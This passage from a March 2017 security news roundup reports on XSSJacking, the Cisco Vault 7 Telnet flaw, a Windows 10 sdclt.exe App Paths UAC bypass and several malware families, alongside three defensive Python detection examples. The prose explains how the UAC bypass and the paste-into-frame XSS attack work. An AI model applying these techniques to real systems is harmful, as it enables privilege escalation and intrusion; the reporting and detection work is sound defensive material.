No Chrome flaws have been disclosed at this year’s event and only one was reported at Pwn2Own 2016. It has become increasingly difficult to find critical security holes in Google’s web browser, which is why the company recently decided to increase rewards for remote code execution vulnerabilities to $31,337.


New Attack Combines Self-XSS and Clickjacking

20.3.2017 securityweek Attack
A researcher has demonstrated an attack that combines Clickjacking and a type of Cross Site Scripting (XSS) called Self-XSS. The new attack can trigger Self-XSS on pages that are also vulnerable to Clickjacking, the researcher says.

Dubbed XSSJacking and detailed by Dylan Ayrey, the attack abuses "Pastejacking", a method of replacing the contents of a user's clipboard with attacker-controlled content. Detailed by the same researcher, this technique can only be triggered on browser events, but it allows an attacker to gain code execution by tricking a user into running commands they didn’t want to run.

XSSJacking, Ayrey explains, takes advantage of Pastejacking to force users to paste XSS payloads into text fields framed from other domains. Furthermore, an attacker could trick the user into believing they are interacting with another website, by redressing the frames, making them invisible, and overlaying them on top of other interface elements.

Self-XSS and Clickjacking are often excluded from bug bounty payouts, but the researcher demonstrates that there are relatively practical ways to execute XSS payloads on websites that are vulnerable to both of them.

The Self-XSS vulnerability is usually triggered when the user types in an XSS payload that triggers on itself. This, the researcher says, can be set in a field that only the user can view. Clickjacking, on the other hand, relies on framing a website of a logged-in user (usually by setting the opacity of the frame to 0) and forcing the victim to interact with their account on a different website.

To demonstrate the attack, the researcher set up two websites, the first of which has an input field vulnerable to Self-XSS, but designed to only pop an alert if specific code (<script>alert(1)</script>) is entered into the field. The second site asks users to input their email address twice, which entices them to use the Copy-Paste pair of commands (many write the email address in the first field, then copy and paste it in the second field).

“This is where the Pastejacking comes in. After the copy, the contents of their clipboard get overwritten with <script>alert(1)</script>. The second email field is actually a cropped Iframe of the vulnerable site. When the victim goes to paste their email into the field, they'll actually paste the script tag, and trigger the XSS on the victim's domain,” Ayrey notes.

The researcher concludes that, although Clickjacking and Self-XSS are typically excluded from bug bounties, an attacker can easily craft a payload to force the XSS to trigger, if both vulnerabilities are present on the website.
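XSSJacking needs two preconditions, and the one a defender can verify from headers alone is that the vulnerable page can be framed at all. As an added example that is not part of Ayrey's write-up, the Python check below takes a page's response headers and decides whether a given embedding origin could frame it, applying the precedence browsers use (a CSP frame-ancestors directive wins over X-Frame-Options); the origins and headers are constructed.

```python
"""Decide from response headers whether a page can be framed by a given origin.

Browsers enforce CSP frame-ancestors in preference to X-Frame-Options, so a
scanner must check the CSP first. A page that an attacker origin can frame and
that echoes user input unencoded meets both XSSJacking preconditions.
All sample origins and headers here are constructed for illustration."""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin_parts(origin):
    """Split 'scheme://host[:port]' into (scheme, host, effective port)."""
    u = urlsplit(origin)
    scheme = u.scheme.lower()
    return scheme, (u.hostname or "").lower(), u.port or DEFAULT_PORTS.get(scheme)


def _source_matches(source, page_origin, embedder_origin):
    """Does one CSP source expression admit embedder_origin as an ancestor?"""
    source = source.strip().lower()
    if source == "'none'":
        return False
    if source == "'self'":
        return _origin_parts(page_origin) == _origin_parts(embedder_origin)
    if source == "*":
        return True
    e_scheme, e_host, e_port = _origin_parts(embedder_origin)
    if source.endswith(":") and "/" not in source:        # scheme-source such as "https:"
        want = source[:-1]
        return e_scheme == want or (want == "http" and e_scheme == "https")
    scheme, rest = source.split("://", 1) if "://" in source else (None, source)
    host, _, port = rest.partition(":")
    if scheme and e_scheme != scheme and not (scheme == "http" and e_scheme == "https"):
        return False
    if host.startswith("*."):
        if not e_host.endswith(host[1:]):                  # "*.x.example" matches "a.x.example", not "x.example"
            return False
    elif host != e_host:
        return False
    if port == "":
        return e_port == DEFAULT_PORTS.get(e_scheme)
    return port == "*" or (port.isdigit() and int(port) == e_port)


def frame_ancestors_lists(headers):
    """Collect the source list of every enforced frame-ancestors directive."""
    lists = []
    for name, value in headers:
        if name.lower() != "content-security-policy":      # report-only policies do not block
            continue
        for directive in value.split(";"):
            dname, _, sources = directive.strip().partition(" ")
            if dname.lower() == "frame-ancestors":
                lists.append(sources.split())
    return lists


def frameable_by(headers, page_origin, embedder_origin):
    """Return (frameable, reason) for a page served with `headers` (list of (name, value))."""
    policies = frame_ancestors_lists(headers)
    if policies:
        # Every delivered policy must allow the ancestor; CSP supersedes X-Frame-Options.
        for sources in policies:
            if not any(_source_matches(s, page_origin, embedder_origin) for s in sources):
                return False, "blocked by CSP frame-ancestors"
        return True, "allowed by CSP frame-ancestors"
    xfo = [v.strip().lower() for n, v in headers if n.lower() == "x-frame-options"]
    if not xfo:
        return True, "no framing protection: clickjacking possible"
    if len(set(xfo)) > 1 and set(xfo) & {"deny", "sameorigin", "allowall"}:
        return False, "conflicting X-Frame-Options values are treated as deny"
    if xfo[0] == "deny":
        return False, "blocked by X-Frame-Options: DENY"
    if xfo[0] == "sameorigin":
        same = _origin_parts(page_origin) == _origin_parts(embedder_origin)
        return same, "X-Frame-Options: SAMEORIGIN"
    # ALLOW-FROM and unknown values are ignored by current browsers: the page is frameable.
    return True, f"X-Frame-Options value {xfo[0]!r} is not enforced by browsers"


if __name__ == "__main__":
    # Constructed header sets for a page carrying a Self-XSS-prone input field.
    samples = {
        "unprotected": [],
        "xfo-deny": [("X-Frame-Options", "DENY")],
        "csp": [("Content-Security-Policy",
                 "default-src 'self'; frame-ancestors 'self' https://*.partner.example")],
    }
    for label, hdrs in samples.items():
        print(label, frameable_by(hdrs, "https://app.example", "https://attacker.example"))
```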


CIA Vault7 Leak – Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution flaw
20.3.2017 securityaffairs Vulnerability

After the leak of the CIA Vault7 archive, experts from CISCO warn of Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution flaw.
WikiLeaks recently announced it is planning to share with IT firms details about vulnerabilities in a number of their products; the flaws are exploited by the hacking tools and techniques included in the CIA Vault7 data leak.

Assange sent an email to tech firms including “a series of conditions” that they need to fulfill before gaining access to details included in the Vault7.

But it seems that some IT giants will not accept the conditions. One of them is Cisco, which started its own analysis of the Vault7 documents. The company has already identified an IOS / IOS XE bug that affects more than 300 of its switch models.

Vault7

The flaw in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could be exploited by a remote, unauthenticated attacker to remotely execute code with elevated privileges and also to cause a reload of the affected device.

The hack could allow attackers to obtain full control of the vulnerable device.

The Cluster Management Protocol relies on Telnet internally as a signaling and command protocol between members of the cluster.

“The vulnerability is due to the combination of two factors:

The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and
The incorrect processing of malformed CMP-specific Telnet options.”
An attacker could trigger the vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections.

The vulnerability affects the default configuration of the flawed devices even when the user doesn’t have switch clusters configured, and can be exploited over either IPv4 or IPv6.

“An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device”, Cisco’s advisory states.

CISCO advisory confirms that the vulnerability affects 264 Catalyst switches, 51 industrial Ethernet switches, and three other CISCO devices. Of course, the vulnerable devices are all running IOS and configured to accept Telnet connections.

As a mitigation measure, Cisco suggests disabling Telnet connections; SSH remains the best option for remotely accessing the devices.

At the time of writing, it is not clear if the flaw was exploited in the wild.


Disable TELNET! Cisco finds 0-Day in CIA Dump affecting over 300 Network Switch Models
20.3.2017 thehackernews Vulnerability

Cisco is warning of a new critical zero-day IOS / IOS XE vulnerability that affects more than 300 of its switch models.
The company identified this highest-severity vulnerability in its products while analyzing "Vault 7", roughly 8,761 documents and files leaked by WikiLeaks last week, claiming to detail the hacking tools and tactics of the Central Intelligence Agency (CIA).
The vulnerability resides in the Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software.
If exploited, the flaw (CVE-2017-3881) could allow an unauthenticated, remote attacker to cause a reboot of an affected device or remotely execute malicious code on the device with elevated privileges to take full control of the device, Cisco says in its advisory.
The CMP protocol has been designed to pass around information about switch clusters between cluster members using Telnet or SSH.
The vulnerability is in the default configuration of affected Cisco devices, even if the user doesn't configure any cluster configuration commands. The flaw can be exploited during Telnet session negotiation over either IPv4 or IPv6.
According to the Cisco researchers, this bug occurs in Telnet connections within the CMP, due to two factors:
The protocol doesn't restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members; instead, it accepts and processes commands over any Telnet connection to an affected device.
The incorrect processing of malformed CMP-specific Telnet options.
So, in order to exploit this vulnerability, an attacker can send "malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections," researchers say.
This exploitation could allow the attacker to remotely execute malicious code and obtain full control of the affected device or cause a reload of the affected device.
Disable Telnet On Vulnerable Models — Patch is not Available Yet!
The vulnerability affects 264 Catalyst switches, 51 industrial Ethernet switches, and 3 other devices, which include Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2/3 EtherSwitch Service Module, Enhanced Layer 2 EtherSwitch Service Module, ME 4924-10GE switch, IE Industrial Ethernet switches, RF Gateway 10, SM-X Layer 2/3 EtherSwitch Service Module, and Gigabit Ethernet Switch Module (CGESM) for HP.
Currently, this vulnerability is unpatched; until patches are available, Cisco recommends that users disable Telnet connections to the switch devices in favor of SSH.
The company's advisory doesn't talk about any working exploit using this flaw, but if there's one, tens of thousands, if not hundreds of thousands, of devices installed around the world look to have been at great risk for an unknown period — Thanks to the CIA for holding the flaw.
Cisco will update its IOS Software Checker tool immediately as soon as the patches come out.
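Both write-ups of this flaw above come down to the same two factors: CMP-specific Telnet options are accepted on any Telnet connection, and malformed ones are mishandled. As an added example that is not Cisco's code, the Python audit below parses a captured Telnet byte stream and flags the negotiation an ordinary management session would never produce: options outside the standard set from a source that is not a cluster peer, subnegotiations for options never negotiated, and oversized or unterminated subnegotiations. The option number CMP uses is not given on the page, so the sample stream uses a placeholder value; the size threshold and the sample sessions are constructed.

```python
"""Audit a captured Telnet stream for option negotiation that a normal
management login would not produce. Added example; the placeholder option
number below is NOT the real cluster-protocol option, and the threshold and
sample sessions are constructed."""

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
VERBS = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}
# Options an interactive Telnet session legitimately negotiates (RFC 855 family).
STANDARD_OPTIONS = {0: "BINARY", 1: "ECHO", 3: "SUPPRESS-GO-AHEAD", 5: "STATUS",
                    6: "TIMING-MARK", 24: "TERMINAL-TYPE", 31: "NAWS",
                    32: "TERMINAL-SPEED", 33: "TOGGLE-FLOW-CONTROL", 34: "LINEMODE",
                    35: "X-DISPLAY-LOCATION", 36: "ENVIRON", 39: "NEW-ENVIRON"}
MAX_SUBNEG_PAYLOAD = 256   # constructed threshold; real subnegotiations are a few bytes


def parse_telnet(stream):
    """Split a Telnet stream into (data, negotiations, subnegotiations, findings).

    negotiations: list of (verb, option); subnegotiations: list of (option, payload)."""
    data, negotiations, subnegs, findings = bytearray(), [], [], []
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            data.append(stream[i]); i += 1
            continue
        if i + 1 >= n:
            findings.append("truncated IAC at end of stream"); break
        cmd = stream[i + 1]
        if cmd == IAC:                              # escaped 0xFF data byte
            data.append(IAC); i += 2
        elif cmd in VERBS:
            if i + 2 >= n:
                findings.append("truncated option negotiation"); break
            negotiations.append((VERBS[cmd], stream[i + 2])); i += 3
        elif cmd == SB:
            j, payload, closed = i + 2, bytearray(), False
            while j < n:                            # read until IAC SE, unescaping IAC IAC
                if stream[j] != IAC:
                    payload.append(stream[j]); j += 1
                elif j + 1 < n and stream[j + 1] == IAC:
                    payload.append(IAC); j += 2
                elif j + 1 < n and stream[j + 1] == SE:
                    closed = True; j += 2; break
                else:
                    findings.append("stray IAC inside subnegotiation"); j += 1
            if not closed:
                findings.append("unterminated subnegotiation (missing IAC SE)"); break
            if payload:
                subnegs.append((payload[0], bytes(payload[1:])))
            else:
                findings.append("empty subnegotiation")
            i = j
        else:                                       # NOP, AYT, GA and friends are two bytes
            i += 2
    return bytes(data), negotiations, subnegs, findings


def audit_telnet_session(stream, from_cluster_peer=False):
    """Return a list of findings; an empty list means nothing unusual was seen."""
    _, negotiations, subnegs, findings = parse_telnet(stream)
    negotiated = set()
    for verb, opt in negotiations:
        negotiated.add(opt)
        if opt not in STANDARD_OPTIONS and not from_cluster_peer:
            findings.append(f"non-standard option {opt} ({verb}) from a non-cluster source")
    for opt, payload in subnegs:
        if opt not in STANDARD_OPTIONS and not from_cluster_peer:
            findings.append(f"subnegotiation for non-standard option {opt} "
                            f"({len(payload)} bytes) from a non-cluster source")
        if opt not in negotiated:
            findings.append(f"subnegotiation for option {opt} that was never negotiated")
        if len(payload) > MAX_SUBNEG_PAYLOAD:
            findings.append(f"oversized subnegotiation for option {opt}: {len(payload)} bytes")
    return findings


if __name__ == "__main__":
    PLACEHOLDER_OPT = 0xEE   # placeholder, not the real cluster-protocol option number
    # Constructed sessions: a normal login negotiating ECHO and window size (NAWS),
    # and one negotiating an unexpected option with a large subnegotiation.
    normal = bytes([IAC, DO, 1, IAC, WILL, 31, IAC, SB, 31, 0, 80, 0, 24, IAC, SE]) + b"admin\r\n"
    unexpected = (bytes([IAC, WILL, PLACEHOLDER_OPT, IAC, SB, PLACEHOLDER_OPT])
                  + b"A" * 300 + bytes([IAC, SE]))
    for name, session in (("normal", normal), ("unexpected", unexpected)):
        print(name, audit_telnet_session(session) or "clean")
```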


Hackers Earn $200,000 for VM Escapes at Pwn2Own 2017

20.3.2017 securityweek Congress
White hat hackers earned more than $250,000 for the vulnerabilities they disclosed on the third day of the Pwn2Own 2017 competition, including a couple of exploits that involved escaping VMware virtual machines.

Due to the unprecedented number of contestants and entries, Pwn2Own was extended to three days this year. On the third day, participants targeted the Microsoft Edge browser and VMware Workstation.

First, the 360 Security team earned $105,000 for hacking Edge and achieving a virtual machine (VM) escape. Experts leveraged a heap overflow in Edge, a type confusion in the Windows kernel and an uninitialized buffer flaw in VMware to complete the task.

Tencent Security’s Team Sniper earned $100,000 for a VMware Workstation exploit that can be used to escape VMs. The group leveraged a use-after-free in Windows, and information disclosure and uninitialized buffer flaws in VMware.

The Zero Day Initiative (ZDI) pointed out that a complete exploit was not easy to pull off in this category due to the fact that VMware Tools was not installed in the guest operating system.

Richard Zhu, aka fluorescence, also targeted Edge, but he only earned $55,000 as his exploit chain did not result in a VM escape. The researcher leveraged two use-after-free vulnerabilities in Edge and a buffer overflow in the Windows kernel to escalate privileges to SYSTEM.

ZDI paid out a total of $833,000 for the 51 vulnerabilities disclosed at Pwn2Own 2017. In comparison, participants only earned $460,000 at last year’s event for 21 new flaws.

360 Security obtained the highest number of Master of Pwn points this year, earning them 65,000 ZDI points worth $25,000.

On the first day of Pwn2Own 2017, white hat hackers received $233,000 for hacking Edge, Safari, Ubuntu and Adobe Reader. On the second day of the competition, experts took home $340,000 for exploits targeting Windows, macOS, Firefox, Edge, Safari and Flash Player.


Researcher leveraged App Paths to bypass User Account Control in Windows 10
20.3.2017 securityaffairs Vulnerability

The security expert Matt Nelson has devised a new method that leverages App Paths to bypass the User Account Control (UAC) only on Windows 10.
The researcher detailed a bypass technique that is quite different from the previous ones he devised; the new method “doesn’t rely on the IFileOperation/DLL hijacking approach”.
“I’ve previously blogged about two different bypass techniques, and this post will highlight an alternative method that also doesn’t rely on the IFileOperation/DLL hijacking approach.” reads a blog post published by Nelson. “This technique works on Windows 10 build 15031, where the vast majority of public bypasses have been patched.”

The expert explained that there are several signed binaries in Microsoft's OS that auto-elevate due to their manifest. Nelson analyzed them and focused his investigation on sdclt.exe, the process associated with the Backup and Restore tool in Windows.

He discovered that sdclt.exe auto-elevates due to its manifest only in Windows 10.

sdclt.exe starts control.exe to open a Control Panel item in a high-integrity context, and it obtains the path to control.exe by querying the App Path key for it within the HKEY_CURRENT_USER hive.

“Looking again at the execution flow, sdclt.exe queries the App Path key for control.exe within the HKEY_CURRENT_USER hive.” explained Nelson.

“Calls to HKEY_CURRENT_USER (or HKCU) from a high integrity process are particularly interesting. This often means that an elevated process is interacting with a registry location that a medium integrity process can tamper with,”

An attacker can modify the key that the sdclt.exe query retrieves; the expert managed to have cmd.exe returned by the query.

User Account Control bypass

The method doesn’t allow the use of parameters, so to exploit it the attacker has to place the malicious payload on disk.

“If you try to give the binary any parameters (e.g, C:\Windows\System32\cmd.exe /c calc.exe), it will interpret the entire string as the lpFile value to the ShellExecuteInfo structure, which is then passed over to ShellExecuteEx. Since that value doesn’t exist, it will not execute.” continues Nelson.

The expert published a PoC script to demonstrate the method. He explained that the attack can be prevented by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group.


Kirk ransomware – A Star Trek Themed Ransomware that requests Monero payments
20.3.2017 securityaffairs Virus

The researchers have discovered a new piece of ransomware featuring a Star Trek theme, dubbed Kirk ransomware, the first one accepting Monero payments.
Ransomware continues to be one of the most profitable cyber threats, for this reason, every week we see new strains of malware in the wild.

The researchers have discovered a new piece of ransomware featuring a Star Trek theme, dubbed Kirk ransomware, that is able to encrypt 625 different file types.

The ransomware appends the .kirk extension to the encrypted file’s name.

The name of the Kirk ransomware is clearly inspired by the popular character in the fiction series Star Trek, as is the name of the decryptor, Spock, associated with the threat.

The Kirk ransomware was first discovered by the Avast malware researcher Jakub Kroustek. It is written in Python and is the first ransomware that uses the Monero cryptocurrency as its payment currency of choice.

Jakub Kroustek @JakubKroustek
This is interesting! #Ransomware made by Trekkie - #Kirk ransomware & #Spock decryptor. Payments in #Monero. #Python https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/ …
4:29 PM - 16 Mar 2017
“Discovered today by Avast malware researcher Jakub Kroustek, the Kirk Ransomware is written in Python and may be the first ransomware to utilize Monero as the ransom payment of choice.” wrote Lawrence Abrams from BleepingComputer.

The majority of ransomware in the wild demands Bitcoin payments.

“Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult.”

The researchers are still investigating the way the Kirk Ransomware is being distributed, they observed it masquerading as the popular network stress tool Low Orbital Ion Cannon.

When the malware is executed it generates an AES key that will be used to encrypt the victim’s files. The AES key is then encrypted with an embedded RSA-4096 public key and saved in a file called ‘pwd’ that is stored in the directory of the ransomware executable.

The crooks behind the Kirk ransomware ask for this file to be able to provide the victims with the decryptor.

In the same folder, the ransomware drops a ransom note instructing users to purchase around $1,100 worth of Monero and send it to a specific address. Once the victim has paid, he should send the pwd file and the payment transaction ID to the kirk.help@scryptmail.com or kirk.payments@scryptmail.com email addresses in order to receive the Spock decryptor.

“At this time there are no known victims of this ransomware and it does not appear to be decryptable,” Abrams added.



Pre-installed malware on smartphones is a new insidious threat

19.3.2017 SecurityWorld Viruses
Check Point Mobile Threat Prevention technology uncovered a severe infection on 38 Android devices at a large telecommunications company and a multinational technology company. Although this is not unusual in itself, one detail of the attacks is very interesting. In all cases, the malware was not downloaded to the device by the user; the threat was already pre-installed on the device.

The malware was on the devices before the users received them, but the malicious apps were not part of the official ROM supplied by the manufacturer and were added somewhere along the supply chain. In six cases, the malware was additionally added with system privileges directly into the device ROM, so the threat could not be removed by the user and the device had to be re-flashed.

The research team was able to determine when the manufacturer finished installing the system applications, when the malware was installed, and when the user received the device.

In most cases, the pre-installed malware discovered on the devices stole information and generated revenue by displaying illegitimate advertising. In one case it was the Slocker mobile ransomware. Slocker uses the AES encryption algorithm to encrypt all files on the device and demanded a ransom for providing the decryption key. Slocker uses the Tor anonymity network to communicate with its C&C server.

The general rule is that users should avoid risky websites and should download apps only from official and trusted sources. However, following these guidelines alone is not enough. Pre-installed malware compromises the security of even the most careful users. Moreover, a user who receives a device with malware is unable to notice any changes in the device's behaviour, which often appear after malware is installed.

The discovery of pre-installed malware raises a number of troubling questions about mobile security. Users may receive a device that contains a backdoor or is rooted without their knowledge. To protect against both ordinary and pre-installed malware, users should use advanced security measures that can identify and block any anomaly in device behaviour.


App Paths Used to Bypass User Account Control in Windows 10

19.3.2017 securityaffairs Vulnerability

A new technique that leverages App Paths to bypass the User Account Control (UAC) in Windows 10 has been detailed by security researcher Matt Nelson.

Over the past several months, Nelson detailed other UAC bypass methods as well, namely one abusing Event Viewer and another leveraging the Disk Cleanup utility. The former has been used in live attacks by Remcos RAT and Erebus ransomware operators, as well as by a threat actor targeting military and aerospace organizations in Russia and Belarus.

Now, the researcher uncovered yet another bypass that “doesn’t rely on the IFileOperation/DLL hijacking approach,” but which works only on Windows 10. According to Nelson, Microsoft has focused on resolving the issues leading to previously disclosed bypasses, but the new technique works on Windows 10 build 15031, “where the vast majority of public bypasses have been patched.”

Because there are Microsoft signed binaries that auto-elevate due to their manifest, the researcher decided to have a closer look, and discovered an issue associated with sdclt.exe, which is the process associated with the Backup and Restore tool in Windows. As it turns out, sdclt.exe auto-elevates due to its manifest, but only in Windows 10 (its manifest in Windows 7 prevents auto-elevation when started from medium integrity).

The execution flow of sdclt.exe reveals that the binary starts control.exe to open up a Control Panel item in high-integrity context, and the researcher discovered that the process obtains the path to control.exe by querying the App Path key for it within the HKEY_CURRENT_USER hive.

“Calls to HKEY_CURRENT_USER (or HKCU) from a high integrity process are particularly interesting. This often means that an elevated process is interacting with a registry location that a medium integrity process can tamper with,” Nelson says.

If the search for the full path of control.exe doesn’t return the key from the HKCU hive, sdclt.exe continues the typical Windows search order. However, since the key can be modified and the process searches for it first, an attacker can use this to have sdclt.exe query a modified App Paths key. The researcher managed to have cmd.exe returned by the query, as a high-integrity process.

One thing this technique doesn’t allow for, however, is parameters, meaning that the attacker has to place the payload on disk. When parameters are added, the whole string is interpreted as the lpFile value of the ShellExecuteInfo structure, which is passed to ShellExecuteEx but won’t execute, given that the value doesn’t exist.

The researcher also published a script to GitHub to demonstrate the attack. “The script takes a full path to your payload. C:\Windows\System32\cmd.exe is a good one to validate. It will automatically add the keys, start sdclt.exe and then cleanup,” Nelson explains.

The attack can be prevented by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group, the researcher explains. Further monitoring for this attack could be achieved by utilizing methods/signatures to look for and alert on new registry entries in HKCU\Microsoft\Windows\CurrentVersion\App Paths\Control.exe.
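Both accounts of this technique above end with the same monitoring advice: watch for new App Paths entries for control.exe under the user's hive. As an added example that is not Nelson's script, the Python detection logic below implements that advice over constructed Sysmon-style events (registry value set, event ID 13; process create, event ID 1), alerting on writes to the per-user App Paths entry for control.exe and on auto-elevated sdclt.exe spawning a high-integrity child other than control.exe. Field names follow Sysmon; the user names, SID, paths and command lines in the sample events are made up.

```python
"""Detect the sdclt.exe / App Paths UAC bypass from Sysmon-style events.

Added example, not from Nelson's write-up or script. Events are dicts whose
keys follow Sysmon field names; everything in SAMPLE_EVENTS is constructed."""
import re

# Per-user App Paths entry for control.exe, whether logged as HKCU or HKU\<SID>,
# with or without the Software\ component, optionally followed by a value name.
USER_APP_PATH_CONTROL = re.compile(
    r"^(?:HKCU|HKU\\S-1-5-21(?:-\d+)+)\\(?:Software\\)?Microsoft\\Windows\\CurrentVersion"
    r"\\App Paths\\control\.exe(?:\\.*)?$", re.IGNORECASE)
EXPECTED_CHILD = r"c:\windows\system32\control.exe"   # the only child sdclt.exe should start


def is_user_hive_control_app_path(target_object):
    """True when a registry path points at the user-writable App Paths key for control.exe."""
    return bool(USER_APP_PATH_CONTROL.match(target_object))


def detect_app_paths_uac_bypass(events):
    """Return one alert dict per suspicious event, in event order."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid in (12, 13) and is_user_hive_control_app_path(ev.get("TargetObject", "")):
            # Key creation (12) or value write (13) to the key sdclt.exe queries first.
            alerts.append({
                "rule": "app_paths_hkcu_control_exe",
                "user": ev.get("User"),
                "writer": ev.get("Image"),
                "value": ev.get("Details"),
                "note": "high-integrity sdclt.exe resolves control.exe via a key "
                        "a medium-integrity process can write",
            })
        elif (eid == 1
              and ev.get("ParentImage", "").lower().endswith("\\sdclt.exe")
              and ev.get("IntegrityLevel") == "High"
              and ev.get("Image", "").lower() != EXPECTED_CHILD):
            # The bypass pays off here: sdclt.exe launched the attacker's binary elevated.
            alerts.append({
                "rule": "sdclt_unexpected_child",
                "user": ev.get("User"),
                "child": ev.get("Image"),
                "command_line": ev.get("CommandLine"),
                "note": "auto-elevated sdclt.exe started something other than control.exe",
            })
    return alerts


SAMPLE_EVENTS = [  # constructed, Sysmon-like
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"WORKSTATION\alice",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft"
                     r"\Windows\CurrentVersion\App Paths\control.exe\(Default)",
     "Details": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe", "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\editor.exe\(Default)",
     "Details": r"C:\Program Files\Editor\editor.exe"},        # benign machine-wide entry
    {"EventID": 1, "Image": r"C:\Windows\System32\control.exe", "User": r"WORKSTATION\bob",
     "ParentImage": r"C:\Windows\System32\sdclt.exe", "IntegrityLevel": "High",
     "CommandLine": "control.exe /name Microsoft.BackupAndRestore"},   # expected child
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "User": r"WORKSTATION\alice",
     "ParentImage": r"C:\Windows\System32\sdclt.exe", "IntegrityLevel": "High",
     "CommandLine": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for alert in detect_app_paths_uac_bypass(SAMPLE_EVENTS):
        print(alert["rule"], alert["user"], alert.get("value") or alert.get("child"))
```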


Arbor Networks linked a new Acronym Malware to the Potao Express campaign
19.3.2017 securityaffairs Virus

Security experts at Arbor Networks linked a new Acronym malware to the malicious code used by threat actors behind the Operation Potao Express.
Security experts at Arbor Networks have spotted a new strain of malware that could be linked to the malicious code used by threat actors behind the Operation Potao Express.

The researchers started the investigation after the Italian researcher Antelox shared a link to a VirusTotal analysis on Twitter.

Antelox @Antelox
anybody recognize this?https://www.virustotal.com/en/file/4a91289e99d3597f4c9e54a3d1d311dfb66aa92fd476463834e4d1f8df651762/analysis/ …@Techhelplistcom @malwrhunterteam @JAMESWT_MHT
7:13 PM - 3 Mar 2017
The analysis of the malicious code and of the dropper suggested a possible link to the Potao malware family.

Like the Potao trojan, the Acronym malware has a modular structure.

The Potao malware, which has been described as a “universal modular cyber espionage toolkit,” has been around since at least 2011, but it was first analyzed in detail in 2015 by ESET.

In August 2015, ESET issued a report on a cyber espionage campaign dubbed Operation Potao Express that relied on the diffusion of a trojanized Russian language version of TrueCrypt.

The malware was used in targeted attacks against entities and high-value targets in Ukraine, Russia, Georgia, and Belarus.


Back to the present, the malware researchers at Arbor Networks have discovered a malicious code dubbed “Acronym” based on a debugging string and the URLs pointing to command and control (C&C) servers.

“Upon further investigation, it is a modular malware known as Acronym and could possibly be associated with the Win32/Potao malware family and the Operation Potao Express campaign. This post takes a look at our analysis of Acronym thus far.” reads the analysis published by Arbor Networks.

Both Acronym and its dropper appear to have been compiled in February 2017.

The analysis of the dropper component revealed that it starts by killing any Windows process named “wmpnetwk.exe” and replaces it with the malicious code.

It then contacts a C&C server and sends it information about the infected machine.

Once the bot has completed the initialization phase, it contacts the command and control servers (C2s) and sends back the information, iterating through six possible IP/port pairs.

The Acronym malware gains persistence using Registry or the Task Scheduler.

The malware is able to capture screenshots, download and execute other payloads, and run plugins.

Unfortunately, we have no information about the plugins available because the C&C servers were offline at the time of the analysis conducted by Arbor Networks.

Researchers noticed that the Potao trojan and the Acronym malware use the same C&C infrastructure, both contact C&C domains on the same ports, and both use temporary file names that start with “HH.”

The experts also noticed some differences between the two threats: the encryption and the delivery mechanism are different.

“On the other hand though, there is a lot of functionality missing in Acronym that was documented in Win32/Potao. Some examples:

No decoy document used in the dropper
Dropper doesn’t store the dropped executable compressed
Doesn’t inject into any processes
Doesn’t drop a DLL, but an EXE
No string encryption
No RSA key exchange
No AES encryption
No XML data exchange
Different system information query string
No Windows API hashing”
“As usual with new malware it is too soon to assess how active and widespread this new family will become, but it does have a potential link to a long running malware campaign known as Operation Potao Express that makes it worth watching,” concluded Arbor Networks.


WikiLeaks will disclose CIA exploits to tech companies under specific conditions
19.3.2017 securityaffairs BigBrothers

Assange sent an email to tech firms including “a series of conditions” that they need to fulfill before gaining access to details included in the Vault 7.
A couple of weeks ago Wikileaks published the Vault 7 archive, a huge trove of files detailing CIA hacking tools and capabilities.

The files allegedly originated from a high-security network of the U.S. Central Intelligence Agency (CIA). The Vault 7 data leak sheds light on the hacking capabilities of the US Intelligence Agency and provided details about its spying infrastructure used for the massive surveillance.

“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virginia,” reads the announcement issued by WikiLeaks.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, Trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”

The Vault 7 dump includes confidential information, hacking tools, malicious codes and exploits developed to hack popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

Vault 7

The hacking tools in the arsenal of the CIA have been developed by the CCI’s Engineering Development Group (EDG). The developers at EDG are tasked with developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.

WikiLeaks announced it was planning to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected even if the White House has warned that there may be legal repercussions for the organization.

The organization wants to protect the customers of the major companies whose products are impacted by the hacking tools in the data leak.

